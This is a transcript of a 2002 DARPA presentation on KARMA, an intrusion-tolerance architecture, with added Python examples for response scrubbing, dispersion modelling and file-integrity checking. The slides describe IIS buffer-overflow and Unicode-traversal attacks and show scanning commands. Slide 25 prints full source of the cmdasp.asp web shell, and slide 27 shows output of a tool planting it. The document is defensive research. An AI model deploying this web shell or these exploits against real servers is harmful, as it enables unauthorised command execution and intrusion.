KARMA: Kinetic Application of Redundancy to Mitigate Attacks
(Presentation transcript, DARPA OASIS PI Meeting, Hilton Head, March 12-15, 2002, Aegis Research Corporation)


Slide 1: KARMA, Kinetic Application of Redundancy to Mitigate Attacks (Intrusion Tolerance Using Masking, Redundancy and Dispersion)
DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002
Janet Lepanto, William Weinstein
The Charles Stark Draper Laboratory, Inc.; Aegis Research Corporation

Slide 2: Overview
– Objectives and Assumptions
– Preliminary Test Results
– Validation Test Strategy

Slide 3: Objectives and Assumptions
Objectives
– Employ only a small set of trusted components to protect a large set of untrusted, unmodified COTS servers and databases
– Minimize loss of data confidentiality and integrity in the presence of a successful attack on one of the servers
– Tolerate attacks whose specific signatures are not known a priori
Assumptions
– The attacker desires stealth, so transaction rates will be relatively low
– Attacks employing high transaction rates and recognizable signatures will be addressed by front-end firewalls and/or other intrusion detection mechanisms
– Exploitation of latent vulnerabilities will require more than a single transaction

Slide 4: Architecture
[Architecture diagram. Components shown: External WAN, External Firewall, Gateway, Switched IP, Server (1), Server (2), Server (N), Configuration Manager, Transaction Mediator, Data Base. Legend: COTS, Trusted, Other.]

Slide 5: Mechanisms
Gateway
– Masks the identities of the origin server operating systems and web server applications
– Distributes client transactions among the origin servers such that the client cannot predict which server will handle a transaction
Configuration Manager
– Monitors the status of the origin servers (via an agent on each server) for anomalies
– Reconfigures a server to a “clean” state if anomalies are detected
Transaction Mediator
– Logs transactions to the back-end database to support rollback recovery

Slide 6: KARMA Preliminary Testing
Discovery
– OS identification
– Web server enumeration
– Probing with a malformed request
Web Server Exploitation
– Buffer overflow exploit to obtain a command shell
– Unicode exploit
– Multi-transaction Unicode attack to plant an executable
– Smart multi-transaction attack with server agents active

Slide 7: Discovery (OS Identification)
– OS identification attempts to guess the operating system and version of a remote system
– Freely available programs used for OS identification include xprobe (ICMP based), queso, and nmap
– By identifying the specific operating system of a target platform, a hacker can focus the attack, minimizing time and attack signatures
– KARMA masks the OS identity of the Gateway
[Architecture diagram: Gateway, Configuration Manager, Server (1), Server (2), Server (N)]

Slide 8: Discovery (OS Identification)
OS identification run against the KARMA public IP address:
– Unable to determine the OS of the remote system
– The time required for this activity is relatively long

[root@aegis With-KARMA]# nmap -sT -n -r -p 80 -P0 -O its.c4i.draper.com
Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ )
Interesting ports on (192.80.95.40):
Port State Service
80/tcp open http
TCP Sequence Prediction: Class=random positive increments
Difficulty=38245 (Worthy challenge)
No OS matches for host (If you know what OS is running on it, see http://www.insecure.org/cgi-bin/nmap-submit.cgi).
Nmap run completed – 1 IP address (1 hosts up) scanned in 24 seconds

Slide 9: Discovery (Web Server Enumeration)
– Web server enumeration attempts to remotely determine the currently running version of the web server software
– In response to a HEAD command, web servers typically reveal the software version in the “Server” field of the HTTP response
– Successful enumeration allows a hacker to focus the attack against the specific web server software
– KARMA scrubs web server responses to mask the identity of the responding web server:
  – Removes specific identifying information (e.g., the “Server” header)
  – Removes server-unique information such as ETags
  – Reformats error responses to mask server-unique implementations
[Architecture diagram: Gateway, Configuration Manager, Server (1), Server (2), Server (N)]

Slide 10: Discovery (Web Server Enumeration)
Probe the web server directly:
– Issue the HEAD command to the server
– The “Server” field identifies the server as Microsoft-IIS/4.0

[root@mystic Without-KARMA]# nc 192.168.0.14 80
HEAD / HTTP/1.0

HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Content-Location: http://192.168.0.14/Default.htm
Date: Fri, 04 Jan 2002 19:41:23 GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Wed, 02 Jan 2002 21:36:45 GMT
ETag: "804e5a95c5ec11:b84"
Content-Length: 6783

Slide 11: Discovery (Web Server Enumeration)
Probe the web server via KARMA:
– Issue the HEAD command to the server
– The “Server” field is no longer present in the HTTP response

[root@aegis With-KARMA]# nc its.c4i.draper.com 80
HEAD / HTTP/1.0

HTTP/1.1 200 OK
Connection: close
Date: Fri, 04 Jan 2002 22:40:28 GMT
Accept-Ranges: bytes
Content-Length: 6913
Content-Type: text/html
Last-Modified: Wed, 02 Jan 2002 21:36:45 GMT

Slide 12: Discovery (Probing with a Malformed Request)
– A system often discloses information when responding to erroneous conditions
– Attackers can trigger such disclosure and use the information to create a blueprint of the target network
– Upon receiving a malformed request for an existing directory, the web server responds with an error message that contains its internal IP address
– KARMA sanitizes error responses from the web servers and then forwards them to the user
[Architecture diagram: Gateway, Configuration Manager, Server (1), Server (2), Server (N)]

Slide 13: Discovery (Probing with a Malformed Request)
Issue “GET /html” directly to an origin server:
– The web server returns a “302 Object Moved” error
– The error message contains the internal IP address

[root@mystic Without-KARMA]# nc 192.168.0.14 80
GET /html HTTP/1.0

HTTP/1.1 302 Object Moved
Location: http://192.168.0.14/html/
Server: Microsoft-IIS/4.0
Content-Type: text/html
Content-Length: 141

Document Moved Object Moved This document may be found here

Slide 14: Discovery (Probing with a Malformed Request)
Issue “GET /html” via KARMA:
– The web server returns a “301 Moved Permanently” error
– The error message does not contain the internal IP address

[root@aegis With-KARMA]# nc its.c4i.draper.com 80
GET /html HTTP/1.0

HTTP/1.1 301 Moved Permanently
Connection: close
Location: http://its.c4i.draper.com/html/
Content-Length: 254

301 - Moved Permanently http://its.c4i.draper.com/html/
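The scrubbing that slides 9 through 14 show from the outside (the “Server” and ETag headers removed, the internal address gone from the redirect, the IIS-specific “302 Object Moved” page replaced by a uniform 301) is the kind of response rewriting a gateway does before forwarding to the client. The following is an added example of that logic written for this transcript, not KARMA's own code. It assumes plain HTTP/1.x text responses, that the gateway knows the internal origin addresses, and that one public hostname fronts all origins; the Content-Location and X-* header names are assumptions beyond what the slides list, and the HTML body of the 302 sample is reconstructed because the transcript kept only its visible text.

```python
"""Origin-response scrubbing of the kind the KARMA Gateway performs (slides 9-14).
Added example, not the project's code."""

# "Server" and ETag are named on the slides; Content-Location is added because the
# slide 10 capture shows it leaking an internal address; the X-* names are common
# extras that identify the application stack (assumed, not on the slides).
STRIP_HEADERS = {"server", "etag", "content-location", "x-powered-by", "x-aspnet-version"}

# Emit headers in one fixed order so ordering itself cannot fingerprint the origin.
HEADER_ORDER = ["Connection", "Date", "Accept-Ranges", "Content-Length",
                "Content-Type", "Last-Modified", "Location"]


def parse_response(raw):
    """Split a raw response into (status line, [(name, value), ...], body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return lines[0], headers, body


def _rewrite_hosts(text, internal_hosts, public_host):
    """Replace every internal origin address with the public name."""
    for host in internal_hosts:
        text = text.replace(host, public_host)
    return text


def scrub_response(raw, internal_hosts, public_host):
    """Return the response a client behind the gateway should see."""
    status, headers, body = parse_response(raw)
    version, code = status.split(" ")[:2]
    kept = {}
    for name, value in headers:
        key = name.lower()
        if key in STRIP_HEADERS:
            continue
        kept[key] = (name, _rewrite_hosts(value, internal_hosts, public_host))
    original_body = body
    if code.startswith("3") and "location" in kept:
        # Replace the origin's own redirect page (IIS: "302 Object Moved" plus an
        # HTML body) with a uniform 301 whose body reveals nothing about the origin.
        status = f"{version} 301 Moved Permanently"
        body = f"301 - Moved Permanently {kept['location'][1]}\r\n"
        kept.pop("content-type", None)
    else:
        body = _rewrite_hosts(body, internal_hosts, public_host)
    if body != original_body:
        # Recompute only when the body changed: a HEAD response carries the length
        # of the entity it would have sent and must keep that value.
        kept["content-length"] = ("Content-Length", str(len(body.encode())))
    kept["connection"] = ("Connection", "close")
    ordered = sorted(
        kept.values(),
        key=lambda nv: HEADER_ORDER.index(nv[0]) if nv[0] in HEADER_ORDER else len(HEADER_ORDER),
    )
    return "\r\n".join([status] + [f"{n}: {v}" for n, v in ordered]) + "\r\n\r\n" + body


# Sample inputs: the HEAD response from slide 10, and the 302 from slide 13 with a
# reconstructed HTML body (constructed here; the transcript kept only its text).
SAMPLE_HEAD = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Microsoft-IIS/4.0\r\n"
    "Content-Location: http://192.168.0.14/Default.htm\r\n"
    "Date: Fri, 04 Jan 2002 19:41:23 GMT\r\n"
    "Content-Type: text/html\r\n"
    "Accept-Ranges: bytes\r\n"
    "Last-Modified: Wed, 02 Jan 2002 21:36:45 GMT\r\n"
    'ETag: "804e5a95c5ec11:b84"\r\n'
    "Content-Length: 6783\r\n\r\n"
)
_REDIRECT_BODY = ('<head><title>Document Moved</title></head><body><h1>Object Moved</h1>'
                  'This document may be found <a HREF="http://192.168.0.14/html/">here</a></body>')
SAMPLE_REDIRECT = (
    "HTTP/1.1 302 Object Moved\r\n"
    "Location: http://192.168.0.14/html/\r\n"
    "Server: Microsoft-IIS/4.0\r\n"
    "Content-Type: text/html\r\n"
    f"Content-Length: {len(_REDIRECT_BODY)}\r\n\r\n" + _REDIRECT_BODY
)

if __name__ == "__main__":
    for sample in (SAMPLE_HEAD, SAMPLE_REDIRECT):
        print(scrub_response(sample, ["192.168.0.14"], "its.c4i.draper.com"))
```

Two design points worth noting: header order is canonicalised as well as filtered, because the order in which an origin emits headers is itself a fingerprint; and Content-Length is recomputed only when the body was actually rewritten, since a HEAD response legitimately advertises the length of an entity it does not send (slide 11 keeps that header).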

Slide 15: Web Server Exploitation (Buffer Overflow)
– The Windows 2000 Internet printing ISAPI extension is vulnerable to a buffer overflow exploit
– The exploit causes a buffer overflow on the IIS web server, which returns a command shell to the attacker on TCP port 81
– This command shell has administrator-level access, enabling the attacker to modify all data on the machine and launch additional attacks from the compromised server
[Architecture diagram: Gateway, Configuration Manager, Server (1), Server (2), Server (N)]

Slide 16: Web Server Exploitation (Buffer Overflow)
Execute directly against the server and listen for a shell on port 81:
– Command shell returned from the server
– The “ver” command returns the version of Windows
– “ipconfig /all” reports the server’s network configuration

Slide 17: Web Server Exploitation (Buffer Overflow)
Execute via KARMA and listen for a shell on port 81:
– Unsuccessful: the command shell is never returned
– Attack is thwarted

Slide 18: Web Server Exploitation (Unicode Exploit)
– Microsoft IIS 4.0 and 5.0 are both vulnerable to double-dot “../” directory traversal exploitation if extended Unicode character representations are used in substitution for “/” and “\” (such as %c0 and %af)
– This vulnerability enables unauthenticated users to access any known file or program on the web server
– Successful exploitation would yield the same privileges as a user who could remotely log onto the system with no credentials
[Architecture diagram: Gateway, Configuration Manager, Server (1), Server (2), Server (N)]

Slide 19: Web Server Exploitation (Unicode Exploit)
Execute the Unicode attack directly against the server:
– “dir c:\” reveals the contents of the root directory
– The “ver” command returns the version of Windows

Slide 20: Web Server Exploitation (Unicode Exploit)
Execute the Unicode attack via KARMA:
– “dir c:\” is sent to the server several times before success
– “ver” returns an error message for every request

Slide 21: Web Server Exploitation (Multi-Transaction)
– A multi-transaction Unicode attack requires a sequence of successful Unicode requests (transactions), for example uploading a file line by line using the Windows “echo” command
– The attacker uploads the following to exploit the web server:
  – cmdasp.asp (exploit that allows the attacker to execute commands with system-level privileges)
  – upload.asp (script that allows an attacker to upload files via HTTP)
– KARMA dispersion makes multi-transaction attacks more difficult:
  – Increases the time required to exploit the web server
  – Increases the attack signature and the probability of detection
[Architecture diagram: Gateway, Configuration Manager, Server (1), Server (2), Server (N)]
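The two claims on this slide (dispersion lengthens the attack and enlarges its signature) can be quantified. The following added example, written for this transcript and not part of the KARMA project, models the Gateway as choosing one of N origin servers per transaction uniformly at random with a CSPRNG, which the client cannot influence, and treats a K-line script as useful only once all K lines sit on the same server. It covers both the blind attacker of slide 24 (every line sent once) and the checking attacker of slide 27 (each line retried until the partial file grows). The model assumes the attacker's verification request reports the state of the server holding the partial file; in reality that request is dispersed too, so the figures here are an underestimate of the real cost. The four-server count is a constructed figure.

```python
"""How dispersion stretches a multi-transaction attack (slides 21, 24 and 27).
Added example, not project code."""
import random
import secrets


def route(n_servers):
    """Gateway-side choice of origin server: unpredictable to the client."""
    return secrets.randbelow(n_servers)


def prob_all_same_server(n_servers, n_lines):
    """Blind attacker (slide 24): no verification, every line is fired once.
    All K lines land on one server with probability N^-(K-1)."""
    return n_servers ** -(n_lines - 1)


def expected_transactions(n_servers, n_lines):
    """Checking attacker (slide 27): line 1 succeeds wherever it lands and fixes
    the target; each later line is retried until it hits that server, a geometric
    trial with mean N. Expected total: 1 + (K-1)*N transactions, every one of
    which passes through the Gateway and adds to the attack signature."""
    return 1 + (n_lines - 1) * n_servers


def simulate_checking_attacker(n_servers, n_lines, rng):
    """Count transactions until one server has received all K lines."""
    target = None
    transactions = 0
    for _ in range(n_lines):
        while True:
            transactions += 1
            server = rng.randrange(n_servers)
            if target is None:
                target = server   # first line creates the file on some server
                break
            if server == target:
                break             # verification shows the file grew
    return transactions


def mean_transactions(n_servers, n_lines, trials=2000, seed=1):
    """Monte Carlo check of expected_transactions with a seeded PRNG."""
    rng = random.Random(seed)
    total = sum(simulate_checking_attacker(n_servers, n_lines, rng) for _ in range(trials))
    return total / trials


if __name__ == "__main__":
    # Slide 27 uploads a 36-line cmdasp.asp; four origin servers is a constructed figure.
    n, k = 4, 36
    print("blind attacker, P(all lines on one server):", prob_all_same_server(n, k))
    print("checking attacker, expected transactions:", expected_transactions(n, k))
    print("simulated mean:", mean_transactions(n, k))
    print("direct attack needs", k, "transactions; next routed server:", route(n))
```

For a 36-line script against four servers the blind attacker's chance of ever assembling the file is 4^-35, and the checking attacker needs about 141 transactions instead of 36, all of them visible to the Gateway and, as slide 27 shows, to the server agents. The comparison also explains why the choice must come from a CSPRNG: a predictable scheduler would let the attacker time each line to the same server and collapse the cost back to K.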

Slide 22: Web Server Exploitation (Multi-Transaction)
– unicodeloader.pl uploads the file cmdasp.asp line by line, utilizing the “echo” command in multiple Unicode strings
– cmdasp.asp is a web script that exploits a local Windows vulnerability, enabling the attacker to execute commands with system-level privileges
– The attacker accesses cmdasp.asp with a web browser and enters commands

Slide 23: Web Server Exploitation (Multi-Transaction)
Attack the web server directly

Slide 24: Web Server Exploitation (Multi-Transaction)
Attack the web servers via KARMA

Slide 25: Web Server Exploitation (Multi-Transaction)

“cmdasp.asp” without KARMA (line numbers as on the slide; lines that held only HTML markup lost their tags in the transcript):
1 -
2 - <%
3 - Dim oScript
4 - Dim oScriptNet
5 - Dim oFileSys, oFile
6 - Dim szCMD, szTempFile
7 - On Error Resume Next
8 - Set oScript = Server.CreateObject("WSCRIPT.SHELL")
9 - Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
10 - Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
11 - szCMD = Request.Form(".CMD")
12 - If (szCMD <> "") Then
13 - szTempFile = "C:\" & oFileSys.GetTempName( )
14 - Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
15 - Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
16 - End If
17 - %>
18 -
19 -
20 - " method="POST">
21 - ">
22 -
23 -
24 -
25 -
26 -
27 - <%
28 - If (IsObject(oFile)) Then
29 - On Error Resume Next
30 - Response.Write Server.HTMLEncode(oFile.ReadAll)
31 - oFile.Close
32 - Call oFileSys.DeleteFile(szTempFile, True)
33 - End If
34 - %>
35 -
36 -

“cmdasp.asp” with KARMA (the partial file assembled on one origin server holds only these lines):
3 - Dim oScriptNet
10 - Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
13 - szTempFile = "C:\" & oFileSys.GetTempName( )
17 - %>
20 - " method="POST">
23 -
25 -
28 - If (IsObject(oFile)) Then
32 - Call oFileSys.DeleteFile(szTempFile, True)
36 -

Slide 26: Web Server Exploitation (KARMA Server Agents Active)
– An attacker with detailed knowledge of the KARMA environment can initiate an advanced multi-transaction Unicode attack with error checking: upload a line of the script, then check for success, and repeat
  – Create a unique directory and “echo” the first line of the script
  – Check the file size in the unique directory to verify a successful upload
  – If successful, “echo” line two and continue the process; else retry the first line
– The Server Agent detects changes to the origin server configuration
  – The server is stopped and taken out of service by the Configuration Manager
  – Rebuilt from a trusted archive
  – Returned to service
[Architecture diagram: Gateway, Configuration Manager, Server (1), Server (2), Server (N)]

Slide 27: Web Server Exploitation (KARMA Server Agents Active)
Advanced Unicode upload utility with error checking:
– First line successfully uploaded to the server on the first attempt
– Second line fails several times due to the dispersion mechanism
– Agent identifies the attack and shuts down the server

[root@aegis With-KARMA]# adv-uniloader.pl 192.80.95.40:80 cmdasp.asp
exploiting directory: C:\Inetpub\scripts\adv-uniloader
uploading ASP section:
sending line 1 of 36
Checking directory for upload..
Line uploaded SUCCESSFULL. cmdasp.asp is now 4482 bytes.
sending line 2 of 36
Checking directory for upload..
Upload NOT successfull cmdasp.asp is still 4482 bytes
sending line 2 of 36
Checking directory for upload..
Upload NOT successfull cmdasp.asp is still 4482 bytes
sending line 2 of 36
Checking directory for upload..
Line uploaded SUCCESSFULL. cmdasp.asp is now 4487 bytes.
sending line 3 of 36
Checking directory for upload..

Slide 28: Web Server Exploitation (KARMA Server Agent Log)
Server 4 Agent log file. Annotations on the slide:
– No anomalies detected by the Server Agent on server 4
– Attack detected: stop server, refresh content to original data, and restart web service
– Attack remediated, server 4 back to normal operation

in tier 3: tier completion reporting, verbosity 1, failures 0
in tier 2: tier completion reporting, verbosity 1, failures 0
in tier 2: tier completion reporting, verbosity 1, failures 1
connection to CM closed: fd=164
got cleanup_restart command
The World Wide Web Publishing Service service is stopping.
The World Wide Web Publishing Service service was stopped successfully.
The IIS Admin Service service is stopping...
The IIS Admin Service service was stopped successfully.
The Content Index service is stopping.
The Content Index service was stopped successfully.
The Content Index service is starting.
The Content Index service was started successfully.
The World Wide Web Publishing Service service is starting...
The World Wide Web Publishing Service service was started successfully.
in osa: need to refresh tier 1
in osa: need to refresh tier 2
in osa: need to refresh tier 3
in osa: need to refresh tier 4
in tier 2: tier completion reporting, verbosity 1, failures 0
in tier 3: tier completion reporting, verbosity 1, failures 0

Slide 29: Web Server Exploitation (KARMA Configuration Manager Log)
Configuration Manager log file. Annotations on the slide:
– Server agents reporting OK
– Problem identified by server 4: unauthorized file c:\inetpub\scripts\advuni\cmdasp.asp detected
– Server 4 back to normal operation, servers reporting OK

Each line begins with a timestamp and the reporting agent's address:port; anomaly reports append the offending file and the fields that differ from the reference.

1015623458:432247 192.168.0.14:5104 1 0 1015623614:276 2 0
1015623458:745560 192.168.0.12:5104 1 0 1015623614:276 2 0
1015623459:269210 192.168.0.11:5104 1 0 1015623534:295150 2 0
1015623459:756894 192.168.0.12:5104 1 0 1015623614:276 2 0
1015623460:289141 192.168.0.11:5104 1 0 1015623535:305162 2 0
1015623460:455114 192.168.0.14:5104 1 0 1015623614:276 2 0
1015623460:455132 192.168.0.14:5104 1 0 1015623614:276 3 0
1015623460:768275 192.168.0.12:5104 1 0 1015623614:276 2 0
1015623460:768291 192.168.0.12:5104 1 0 1015623614:276 3 0
1015623467:535619 192.168.0.14:5104 1 3 1015623614:276 2 2 c:\Inetpub\scripts\advuni\cmdasp.asp 2 field 4: filesize different: ref=4482 gath=4487 field 6: mtime different: ref=1013802544:0 gath=1015623975:0
1015623467:535636 192.168.0.14:5104 1 0 1015623614:276 2 1
1015623467:847902 192.168.0.12:5104 1 0 1015623614:276 2 0
1015623468:448854 192.168.0.11:5104 1 0 1015623543:385173 2 0
1015623468:546676 192.168.0.14:5104 1 3 1015623614:276 2 2 c:\Inetpub\scripts\advuni\cmdasp.asp 2 field 4: filesize different: ref=4482 gath=4487 field 6: mtime different: ref=1013802544:0 gath=1015623975:0
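Slide 26 describes the agent's job (detect changes to the origin server's configuration) and slide 29 shows what its report looks like: a file compared against a reference, with the fields that differ (filesize, mtime) printed as ref versus gathered values. The following added example, written for this transcript and not the KARMA agent's code, implements that reference-versus-gathered comparison over a directory tree. It records size, mtime and a SHA-256 digest per file, flags files absent from the reference (the unauthorized file case on slide 29) as well as changed fields, and formats each finding in the style of the slide 29 log. Field names replace the agent's numbered fields ("field 4", "field 6"), whose numbering is not explained on the page; the directory contents in demo() are constructed.

```python
"""Reference-vs-gathered file integrity check in the style of the KARMA server
agent (slides 26, 28 and 29). Added example, not project code."""
import hashlib
import os
import tempfile
import time

FIELD_NAMES = ("filesize", "mtime", "sha256")


def _digest(path):
    """SHA-256 of a file, read in chunks so large content does not sit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root):
    """Map each file's path relative to root -> (size, mtime in seconds, sha256)."""
    manifest = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            st = os.stat(full)
            manifest[os.path.relpath(full, root)] = (st.st_size, int(st.st_mtime), _digest(full))
    return manifest


def compare(reference, gathered):
    """Return one anomaly string per finding, in the slide 29 'ref=.. gath=..' style."""
    anomalies = []
    for rel in sorted(set(reference) | set(gathered)):
        if rel not in reference:
            anomalies.append(f"{rel}: unauthorized file")
            continue
        if rel not in gathered:
            anomalies.append(f"{rel}: file missing")
            continue
        for i, field in enumerate(FIELD_NAMES):
            ref, gath = reference[rel][i], gathered[rel][i]
            if ref != gath:
                anomalies.append(f"{rel}: {field} different: ref={ref} gath={gath}")
    return anomalies


def demo():
    """Build a reference from a constructed content tree, then simulate what a
    line-by-line upload leaves behind: a new script and a modified page."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "scripts"))
        page = os.path.join(root, "Default.htm")
        with open(page, "wb") as f:
            f.write(b"<html>constructed sample content</html>")
        reference = build_manifest(root)

        with open(os.path.join(root, "scripts", "cmdasp.asp"), "wb") as f:
            f.write(b"<% ' constructed placeholder, not the real script %>")
        with open(page, "ab") as f:
            f.write(b"<!-- 5 -->")
        later = time.time() + 100   # force an mtime change regardless of fs resolution
        os.utime(page, (later, later))

        return compare(reference, build_manifest(root))


if __name__ == "__main__":
    for line in demo():
        print(line)
```

The digest is what makes the check robust: an attacker who pads a file back to its reference size and resets its timestamp defeats a size-and-mtime comparison but not a hash. The reference manifest itself must live outside the monitored server (the Configuration Manager's trusted archive on slide 26 is the natural place), since a manifest stored on the host can be rewritten by whoever rewrote the files.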

Slide 30: Summary of Preliminary Test Results
Discovery
– Scanning tools could not determine the OS of the Gateway; origin servers were not directly exposed to OS scans
– Probing to create web server error responses failed to uncover the web server type
Web Server Exploitation
– Buffer overflow of the printing extension failed to return a command shell
– Execution of single-string Unicode exploits was slowed by the dispersion mechanism; the KARMA architecture rendered some “pseudo shell commands” ineffective, but the exploit was able to return directory information
– Multi-transaction file buildup was thwarted by the dispersion mechanism
– Smart multi-transaction file buildup was stopped by the server agent

Slide 31: Validation Test Strategy
Controlled Vulnerability Testing
– Configure origin servers with known weaknesses
– Compare the effect of attacks made directly on a server with the same attack made via KARMA
Blind Red Team Testing
– Configure origin servers with the latest security patches
– Give the Red Team no information at all about the system
– Objective is to compromise the database
Targeted Red Team Testing
– Configure origin servers with the latest security patches
– Inform the Red Team about the general architecture and operating strategy, but provide no details
– Objective is to compromise the database

